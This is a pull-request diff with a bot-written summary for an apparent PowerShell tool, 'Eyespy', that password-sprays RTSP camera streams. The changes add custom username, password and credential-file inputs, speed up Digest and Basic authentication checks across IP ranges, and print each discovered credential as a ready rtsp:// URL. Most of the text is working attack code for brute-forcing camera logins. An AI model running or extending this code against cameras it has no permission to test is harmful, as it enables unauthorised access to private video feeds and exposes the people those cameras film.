-                            "Authorization: Digest username=`"$username`", password=`"$password`", realm=`"$realm`", nonce=`"$nonce`", uri=`"rtsp://$IP`:$Port/$Path`", response=`"$DigestResponse`"$CRLF$CRLF"
+                $authUri = "rtsp://$IP`:$Port/$Path"
+                # Build auth header using string formatting to avoid quote escaping issues
+                $authHeader = 'Authorization: Digest username="{0}", password="{1}", realm="{2}", nonce="{3}", uri="{4}", response="{5}"' -f $username, $password, $realm, $nonce, $authUri, $DigestResponse
+                $request2 = "DESCRIBE $authUri RTSP/1.0$CRLF" +
+                            "CSeq: 1$CRLF" +
+                            "$authHeader$CRLF$CRLF"
+                
+                Write-Verbose "--- Digest Auth Authenticated Request ---"
+                Write-Verbose $request2
+                Write-Verbose "--- End Request ---"
                 
                 # Send it
                 $writer.Write($request2)
                 $writer.Flush()
 
-                #################################################
-                ######## Speed issue is here at the moment ######
-                #################################################
-                
-                # Start reading responses for 200 OK
-                while (!$reader.EndOfStream) {
+                # Read a bounded number of lines looking for 200 OK to avoid slow/hanging loops
+                $maxLinesToRead2 = 15  # Reduced for faster processing when testing thousands of creds
+                $finalResponse = @()
+                for ($i = 0; $i -lt $maxLinesToRead2; $i++) {
+                    if ($reader.EndOfStream) { break }
                     $responseLine = $reader.ReadLine()
+                    $finalResponse += $responseLine
 
-                    if ($responseLine -match 'RTSP/1.0 200 OK') {
+                    # Match RTSP/1.0 200 with any status text (OK, Success, etc.)
+                    if ($responseLine -match 'RTSP/1\.0\s+200') {
+                        Write-Verbose "--- Digest Auth Final Response (SUCCESS) ---"
+                        Write-Verbose ($finalResponse -join "`r`n")
+                        Write-Verbose "--- End Response ---"
+                        Write-Verbose "Valid credentials found: $decodedCredentials"
                         $digestProcessed = $true
+                        # Close connection immediately after success to free resources
+                        if ($null -ne $reader) { $reader.Close() }
+                        if ($null -ne $writer) { $writer.Close() }
+                        if ($null -ne $stream) { $stream.Close() }
+                        if ($null -ne $tcpClient) { $tcpClient.Close() }
                         return $decodedCredentials # Return the decoded Creds once 200 OK is received
+                    }
+                    
+                    # Empty line indicates end of headers
+                    if ([string]::IsNullOrWhiteSpace($responseLine)) {
+                        Write-Verbose "--- Digest Auth Final Response (FAILED) ---"
+                        Write-Verbose ($finalResponse -join "`r`n")
+                        Write-Verbose "--- End Response ---"
+                        break
                     }
                 }
 
                 $digestProcessed = $true
+                # Close connection after processing to free resources quickly
+                if ($null -ne $reader) { $reader.Close() }
+                if ($null -ne $writer) { $writer.Close() }
+                if ($null -ne $stream) { $stream.Close() }
+                if ($null -ne $tcpClient) { $tcpClient.Close() }
+            } else {
+                Write-Verbose "ERROR: Could not extract realm and/or nonce from WWW-Authenticate header"
+                Write-Verbose "Header was: $wwwAuthenticateHeader"
             }
-
+        } elseif (!$headerComplete -and $linesRead -ge $maxLinesToRead) {
+            Write-Verbose "WARNING: Reached max lines to read without finding complete WWW-Authenticate header"
+            Write-Verbose "Response so far: $($challengeResponse -join '`r`n')"
         }
 
     }
@@ -799,9 +1127,10 @@ function Test-DigestRTSPAuth {
        # Write-Warning "An error occurred: $_"
     }
     finally {
-        if ($tcpClient.Connected) {
-            $tcpClient.Dispose()
-        }
+		if ($null -ne $reader) { $reader.Dispose() }
+		if ($null -ne $writer) { $writer.Dispose() }
+		if ($null -ne $stream) { $stream.Dispose() }
+		if ($null -ne $tcpClient) { $tcpClient.Dispose() }
     }
 
     return $null
@@ -850,12 +1179,23 @@ function AuthAttack {
         [Parameter(Mandatory)]
         [string]$Target,
         [Parameter(Mandatory = $False)]
-        [string]$Path
+        [string]$Path,
+        [Parameter(Mandatory = $false)]
+        [string]$CustomUsername,
+        [Parameter(Mandatory = $false)]
+        [string]$CustomPassword,
+        [Parameter(Mandatory = $false)]
+        [string]$CustomCreds
     )
-
     $ipAndPort = $Target.Split(':')
     $ip = $ipAndPort[0]
     $port = $ipAndPort[1]
+
+
+
+	# Initialize collections to ensure reliable concatenation/accumulation
+	$cliaddress = @()
+	$validCredentials = @()
 
     try {
         $tcpClient = New-Object System.Net.Sockets.TcpClient
@@ -883,40 +1223,24 @@ function AuthAttack {
             Write-Host -ForegroundColor Red "$ip`:$port"
             return
         }
-    }
+    } 
     catch {
-        Write-Warning "An error occurred: $_"
-        return
+    
     }
 
-    # Check if the Path parameter was provided and if it's blank or "/"
-    if ($PSBoundParameters.ContainsKey('Path')) {
-        if ($Path -eq "" -or $Path -eq "/") {
-            # Handle the case where Path is explicitly blank or "/"
-            Write-Host "Testing blank path..." -ForegroundColor Yellow
 
-            $getAuth = Get-AuthType -OpenPorts $cliaddress
-            $authRequiredPaths = [PSCustomObject]@{
-                IPAddress = $ip
-                Port      = $port
-                Path      = ""  # Set blank path for testing
-                AuthType  = $getAuth.authType
-            }
-        }
-        else {
-            # Handle case where a valid path is provided
-            $getAuth = Get-AuthType -OpenPorts $cliaddress
-            $authRequiredPaths = [PSCustomObject]@{
-                IPAddress = $ip
-                Port      = $port
-                Path      = $Path
-                AuthType  = $getAuth.authType
-            }
+    if ($PSBoundParameters.ContainsKey('Path')) {
+        # Path parameter is provided, create a PSCustomObject directly
+        $getAuth = Get-AuthType -OpenPorts $cliaddress
+        $authRequiredPaths = [PSCustomObject]@{
+            IPAddress = $ip
+            Port      = $port
+            Path      = $Path
+            AuthType  = $getAuth.authType
         }
     }
     else {
-        # No Path provided, brute force the paths
-        Write-Host "No Path provided, brute-forcing paths..." -ForegroundColor Yellow
+        # Path parameter is not provided, use the default behavior
         $getAuth = Get-AuthType -OpenPorts $cliaddress
         $AuthConstruct = [PSCustomObject]@{
             IPAddress = $ip
@@ -926,56 +1250,77 @@ function AuthAttack {
         $authRequiredPaths = Get-ValidRTSPPaths -OpenPorts $AuthConstruct
     }
 
-    # Continue with password spraying logic...
+
     if ($authRequiredPaths -is [System.Array]) {
         if ($authRequiredPaths.Count -gt 0) {
             Write-Host "=========================================================`r`n"
             Write-Host "Beginning Password Spray:`r`n"
 
-            $index = 0
-            while ($index -lt $authRequiredPaths.Count) {
-                $authPath = $authRequiredPaths[$index]
+            # Group paths by IP:Port to process each port independently
+            $pathsByPort = $authRequiredPaths | Group-Object -Property { "$($_.IPAddress):$($_.Port)" }
+            $portsWithCreds = @{}  # Track which ports have found credentials
 
-                $result = Get-ValidRTSPCredential -IP $authPath.IPAddress -Port $authPath.Port -Path $authPath.Path -authType $authPath.authType
-
-                if ($result.CredentialFound) {
-                    $validCredentials += [PSCustomObject]@{
-                        IPAddress   = $authPath.IPAddress
-                        Port        = $authPath.Port
-                        Path        = $authPath.Path
-                        Credentials = $result.Credential
-                    }
-
-                    Write-Host -ForegroundColor Yellow -NoNewline "====="
-                    Write-Host -NoNewline " Found Credentials "
-                    Write-Host -ForegroundColor Yellow "====="
-
-                    Write-Host -NoNewline -ForegroundColor Green  "[+] "
-                    $authString = $authPath.IPAddress + ":" + $authPath.Port + "/" + $authPath.Path
-                    Write-Host "Path: $authString"
-                    Write-Host -NoNewline -ForegroundColor Green  "[+] "
-                    $credsString = "Creds`: " + $result.Credential
-                    Write-Host "$credsString `r`n"
-                    $fullRTSPString = "rtsp://" + $result.Credential + "@" + $authPath.IPAddress + ":" + $authPath.Port + "/" + $authPath.Path
-                    Write-Host -NoNewline -ForegroundColor Green  ">>> "
-                    Write-Host -NoNewline "$fullRTSPString"
-                    Write-Host -ForegroundColor Green  " <<<`r`n"
-
-                    # Remove the current IP:Port combination from the array
-                    $authRequiredPaths = $authRequiredPaths | Where-Object { ($_.IPAddress -ne $authPath.IPAddress) -or ($_.Port -ne $authPath.Port) }
+            # Process each port group
+            foreach ($portGroup in $pathsByPort) {
+                $portKey = $portGroup.Name
+                $portPaths = $portGroup.Group
+                
+                # Skip this port if we already found credentials for it
+                if ($portsWithCreds.ContainsKey($portKey)) {
+                    continue
                 }
-                else {
-                    $index++
+
+                $credFoundForPort = $false
+
+                # Test credentials for each path in this port (stop when found)
+                foreach ($authPath in $portPaths) {
+                    if ($credFoundForPort) { break }  # Stop testing this port if credentials found
+
+                    $result = Get-ValidRTSPCredential -IP $authPath.IPAddress -Port $authPath.Port -Path $authPath.Path -authType $authPath.authType `
+                        -CustomUsername $CustomUsername -CustomPassword $CustomPassword -CustomCreds $CustomCreds
+
+                    if ($result.CredentialFound) {
+                        $validCredentials += [PSCustomObject]@{
+                            IPAddress   = $authPath.IPAddress
+                            Port        = $authPath.Port
+                            Path        = $authPath.Path
+                            Credentials = $result.Credential
+                        }
+
+                        Write-Host -ForegroundColor Yellow -NoNewline "====="
+                        Write-Host -NoNewline " Found Credentials "
+                        Write-Host -ForegroundColor Yellow "====="
+                    
+                        Write-Host -NoNewline -ForegroundColor Green  "[+] "
+                        $authString = $authPath.IPAddress + ":" + $authPath.Port + "/" + $authPath.Path
+                        Write-Host "Path: $authString"
+                        Write-Host -NoNewline -ForegroundColor Green  "[+] "
+                        $credsString = "Creds`: " + $result.Credential
+                        Write-Host "$credsString `r`n"
+                        $fullRTSPString = "rtsp://" + $result.Credential + "@" + $authPath.IPAddress + ":" + $authPath.Port + "/" + $authPath.Path
+                        Write-Host -NoNewline -ForegroundColor Green  "[RTSP] "
+                        Write-Host "$fullRTSPString"
+
+                        $portsWithCreds[$portKey] = $true
+                        $credFoundForPort = $true
+                    }
                 }
             }
+
+            #return $validCredentials
         }
     } elseif ($null -eq $authRequiredPaths) {
+
         Write-Host -NoNewline -ForegroundColor Green "[+]"
         Write-Host " No Auth Detected, See results above.`r`n"
+
     } else {
+        # $authRequiredPaths is a single object, handle it separately
         Write-Host "Beginning Password Spray:`r`n"
 
-        $result = Get-ValidRTSPCredential -IP $authRequiredPaths.IPAddress -Port $authRequiredPaths.Port -Path $authRequiredPaths.Path -authType $authRequiredPaths.authType
+        $result = Get-ValidRTSPCredential -IP $authRequiredPaths.IPAddress -Port $authRequiredPaths.Port -Path $authRequiredPaths.Path -authType $authRequiredPaths.authType `
+            -CustomUsername $CustomUsername -CustomPassword $CustomPassword -CustomCreds $CustomCreds
+        
 
         if ($result.CredentialFound) {
             $validCredentials += [PSCustomObject]@{
@@ -996,9 +1341,10 @@ function AuthAttack {
             $credsString = "Creds`: " + $result.Credential
             Write-Host "$credsString `r`n"
             $fullRTSPString = "rtsp://" + $result.Credential + "@" + $authRequiredPaths.IPAddress + ":" + $authRequiredPaths.Port + "/" + $authRequiredPaths.Path
-            Write-Host -NoNewline -ForegroundColor Green  ">>> "
-            Write-Host -NoNewline "$fullRTSPString"
-            Write-Host -ForegroundColor Green  " <<<`r`n"
+            Write-Host -NoNewline -ForegroundColor Green  "[RTSP] "
+            Write-Host "$fullRTSPString"
+
+            #return $validCredentials
         }
     }
 
@@ -1006,12 +1352,17 @@ function AuthAttack {
     Write-Host "=========================================================`r`n"
 }
 
-
 function FullAuto {
     [CmdletBinding()]
     param (
         [Parameter(Mandatory)]
-        [string]$Targets
+        [string]$Targets,
+        [Parameter(Mandatory = $false)]
+        [string]$CustomUsername,
+        [Parameter(Mandatory = $false)]
+        [string]$CustomPassword,
+        [Parameter(Mandatory = $false)]
+        [string]$CustomCreds
     )
 
     $ipRange = Get-IpRange -Target $Targets
@@ -1029,42 +1380,54 @@ function FullAuto {
 
             Write-Host "Beginning Password Spray:`r`n"
 
-            $index = 0
+            # Group paths by IP:Port to process each port independently
+            $pathsByPort = $authRequiredPaths | Group-Object -Property { "$($_.IPAddress):$($_.Port)" }
+            $portsWithCreds = @{}  # Track which ports have found credentials
 
-            while ($index -lt $authRequiredPaths.Count) {
-                $authPath = $authRequiredPaths[$index]
-                $result = Get-ValidRTSPCredential -IP $authPath.IPAddress -Port $authPath.Port -Path $authPath.Path -authType $authPath.authType
-
-                if ($result.CredentialFound) {
-                    $validCredentials += [PSCustomObject]@{
-                        IPAddress   = $authPath.IPAddress
-                        Port        = $authPath.Port
-                        Path        = $authPath.Path
-                        Credentials = $result.Credential
-                    }
-
-                    Write-Host -ForegroundColor Yellow -NoNewline "====="
-                    Write-Host -NoNewline " Found Credentials "
-                    Write-Host -ForegroundColor Yellow "====="
+            # Process each port group
+            foreach ($portGroup in $pathsByPort) {
+                $portKey = $portGroup.Name
+                $portPaths = $portGroup.Group
                 
-                    Write-Host -NoNewline -ForegroundColor Green  "[+] "
-                    $authString = $authPath.IPAddress + ":" + $authPath.Port + "/" + $authPath.Path
-                    Write-Host "Path: $authString"
-                    Write-Host -NoNewline -ForegroundColor Green  "[+] "
-                    $credsString = "Creds`: " + $result.Credential
-                    Write-Host "$credsString `r`n"
-                    $fullRTSPString = "rtsp://" + $result.Credential + "@" + $authPath.IPAddress + ":" + $authPath.Port + "/" + $authPath.Path
-                    Write-Host -NoNewline -ForegroundColor Green  ">>> "
-                    Write-Host -NoNewline "$fullRTSPString"
-                    Write-Host -ForegroundColor Green  " <<<`r`n"
+                # Skip this port if we already found credentials for it
+                if ($portsWithCreds.ContainsKey($portKey)) {
+                    continue
+                }
 
-                    # Remove the current IP:Port combination from the array
-                    $authRequiredPaths = $authRequiredPaths | Where-Object { ($_.IPAddress -ne $authPath.IPAddress) -or ($_.Port -ne $authPath.Port) }
+                $credFoundForPort = $false
 
-                    # Reset the index to start processing from the beginning of the array
-                    $index = 0
-                } else {
-                    $index++
+                # Test credentials for each path in this port (stop when found)
+                foreach ($authPath in $portPaths) {
+                    if ($credFoundForPort) { break }  # Stop testing this port if credentials found
+
+                    $result = Get-ValidRTSPCredential -IP $authPath.IPAddress -Port $authPath.Port -Path $authPath.Path -authType $authPath.authType `
+                        -CustomUsername $CustomUsername -CustomPassword $CustomPassword -CustomCreds $CustomCreds
+
+                    if ($result.CredentialFound) {
+                        $validCredentials += [PSCustomObject]@{
+                            IPAddress   = $authPath.IPAddress
+                            Port        = $authPath.Port
+                            Path        = $authPath.Path
+                            Credentials = $result.Credential
+                        }
+
+                        Write-Host -ForegroundColor Yellow -NoNewline "====="
+                        Write-Host -NoNewline " Found Credentials "
+                        Write-Host -ForegroundColor Yellow "====="
+                    
+                        Write-Host -NoNewline -ForegroundColor Green  "[+] "
+                        $authString = $authPath.IPAddress + ":" + $authPath.Port + "/" + $authPath.Path
+                        Write-Host "Path: $authString"
+                        Write-Host -NoNewline -ForegroundColor Green  "[+] "
+                        $credsString = "Creds`: " + $result.Credential
+                        Write-Host "$credsString `r`n"
+                        $fullRTSPString = "rtsp://" + $result.Credential + "@" + $authPath.IPAddress + ":" + $authPath.Port + "/" + $authPath.Path
+                        Write-Host -NoNewline -ForegroundColor Green  "[RTSP] "
+                        Write-Host "$fullRTSPString"
+
+                        $portsWithCreds[$portKey] = $true
+                        $credFoundForPort = $true
+                    }
                 }
             }
 
@@ -1093,7 +1456,7 @@ if ($Search) {
     } else {
 
         Write-Host -NoNewline -ForegroundColor Red "[-]"
-        Write-Host " Please ensure you are entering a valid IP(/CIDR) e.g. 10.0.0.1 or 192.168.0.0/24"
+        Write-Host ' Please ensure you are entering a valid IP(/CIDR) e.g. 10.0.0.1 or 192.168.0.0/24'
     }
 
 
@@ -1106,7 +1469,7 @@ if ($Search) {
     } else {
 
         Write-Host -NoNewline -ForegroundColor Red "[-]"
-        Write-Host " Please ensure you are entering a valid IP(/CIDR) e.g. 10.0.0.1 or 192.168.0.0/24"
+        Write-Host ' Please ensure you are entering a valid IP(/CIDR) e.g. 10.0.0.1 or 192.168.0.0/24'
     }
  
 
@@ -1119,13 +1482,13 @@ if ($Search) {
 			Write-Host -NoNewline -ForegroundColor Yellow "[?]"
 			Write-Host " Try with -NoAuth or -Auto next.`r`n"
 			
-			AuthAttack -Target $AuthAttack -Path $Path
+			AuthAttack -Target $AuthAttack -Path $Path -CustomUsername $Username -CustomPassword $Password -CustomCreds $Creds
 
         } else {
             Write-Host -NoNewline -ForegroundColor Yellow "[?]"
 			Write-Host " Checking Connection and Paths at Target`r`n"
 
-            $result = AuthAttack -Target $AuthAttack
+            $result = AuthAttack -Target $AuthAttack -CustomUsername $Username -CustomPassword $Password -CustomCreds $Creds
     }
     
     } else {
@@ -1138,12 +1501,12 @@ if ($Search) {
 
     if ($Auto -match '^\b((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4}(\/\b(1[6-9]|2[0-9]|3[0-2])\b)?$') {
     
-        FullAuto -Targets $Auto
+        FullAuto -Targets $Auto -CustomUsername $Username -CustomPassword $Password -CustomCreds $Creds
 
     } else {
 
         Write-Host -NoNewline -ForegroundColor Red "[-]"
-        Write-Host " Please ensure you are entering a valid IP(/CIDR) e.g. 10.0.0.1 or 192.168.0.0/24"
+        Write-Host ' Please ensure you are entering a valid IP(/CIDR) e.g. 10.0.0.1 or 192.168.0.0/24'
 
     }
 

--- a/README.md
+++ b/README.md
@@ -91,7 +91,7 @@ Eyespy -Help
 
 ## TODO
 - ~~Async the search function~~
-- Allow for custom username(s) and password(s)
+- ~~Allow for custom username(s) and password(s)~~
 - Output results to file
 
 ## Contributing


### PR DESCRIPTION
Merge dev into main

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> Introduces flexible credential input and faster, more reliable RTSP handling across the tool.
> 
> - Adds `-Username`, `-Password`, `-Creds` (file of `username:password`) and `-Common` flags; updates help/examples and wiring through `AuthAttack`/`FullAuto`
> - New `Invoke-RtspRequest` centralizes RTSP I/O with bounded reads, timeouts, and cleanup; refactors `Get-AuthType`, `Get-ValidRTSPPaths`, and auth tests to use it
> - `Get-ValidRTSPPaths` supports `-UseCommonPaths` for faster scans; groups by IP:Port and improves progress output
> - `GenerateCreds` now builds credential sets from custom inputs or defaults using efficient lists
> - Improves Basic/Digest auth tests (robust header parsing, faster timeouts, verbose logging) and spraying flow; per-port early-stop and end-of-run credential summary
> - Cleans up socket/resource disposal and minor CLI/UX tweaks (banner/options, validation messages)
> - README TODO updated to mark custom credential support as complete
> 
> <sup>Written by [Cursor Bugbot](https://cursor.com/dashboard?tab=bugbot) for commit 51b77d08af8d9a05a0eb52c39fac11b316b3c44b. This will update automatically on new commits. Configure [here](https://cursor.com/dashboard?tab=bugbot).</sup>
<!-- /CURSOR_SUMMARY -->